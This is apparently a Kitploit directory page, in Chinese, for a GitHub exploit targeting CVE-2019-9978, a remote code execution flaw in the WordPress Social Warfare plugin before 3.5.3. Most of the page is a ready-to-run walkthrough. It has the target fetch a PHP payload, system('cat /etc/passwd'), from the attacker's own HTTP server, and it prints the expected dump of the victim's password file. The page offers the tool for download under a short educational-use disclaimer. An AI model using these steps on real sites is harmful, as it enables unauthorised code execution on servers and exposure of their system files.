Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2019-9978 — WordPress Social Warfare 插件中的一个远程代码执行(RCE)漏洞,影响版本低于 3.5.3。 | Kitploit
工具/GitHubGitHub/echoosso/cve-2019-9978
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育Payload 开发
GitHubechoosso/cve-2019-9978

CVE-2019-9978

WordPress Social Warfare 插件中的一个远程代码执行(RCE)漏洞,影响版本低于 3.5.3。

查看仓库
11年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2019-9978 - Social Warfare WordPress 插件 RCE < 3.5.3

Social Warfare WordPress 插件中存在一个远程代码执行(RCE)漏洞,影响所有低于 3.5.3 的版本。


💡 动机

原始的公开利用脚本是用旧版本 Python 编写的,在现代环境中已无法正常运行。
我重写了该利用脚本,使其完全兼容 Python 3,更易于使用、理解,并能集成到现代工具链中。


概念验证 (PoC)

✅ 第 1 步 – 创建 Payload

创建一个名为 payload.txt 的文件,内容如下:

root@kitploit:~
<pre>system('cat /etc/passwd')</pre>

✅ 第 2 步 – 启动 Python HTTP 服务器

使用 Python 提供你的 payload 服务:

root@kitploit:~
python3 -m http.server 8000

这将使你的 payload.txt 可通过以下地址访问:

root@kitploit:~
http://<your-ip>:8000/payload.txt

✅ 第 3 步 – 运行利用脚本

root@kitploit:~
python3 CVE-2019-9978.py --target http://<target-ip>/wordpress \
                         --payload-uri http://<your-ip>:8000/payload.txt

预期输出

如果目标存在漏洞,你将看到类似如下的输出:

root@kitploit:~
[*] Received Response From Server!
[<] Received:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...

截图

HTTP 服务器接收到请求

http-server

成功执行利用

exploit

Payload 文件内容

payload


🧬 如果这个 payload 让你心情愉悦,不妨点个 ⭐ 让我开心一下。

技术细节

  • 插件: Social Warfare
  • 受影响版本: < 3.5.3
  • CVE: CVE-2019-9978
  • 漏洞类型: 远程代码执行 (RCE)
  • 原始作者: @hash3liZer
  • 研究员: Luka Sikic

鸣谢

  • 利用脚本作者: @hash3liZer
  • Python 3 重制: @echosso

⚠️ 免责声明:此仓库仅用于教育和道德测试目的。
未经授权将本利用脚本用于你不拥有的系统是严格禁止的。

下载工具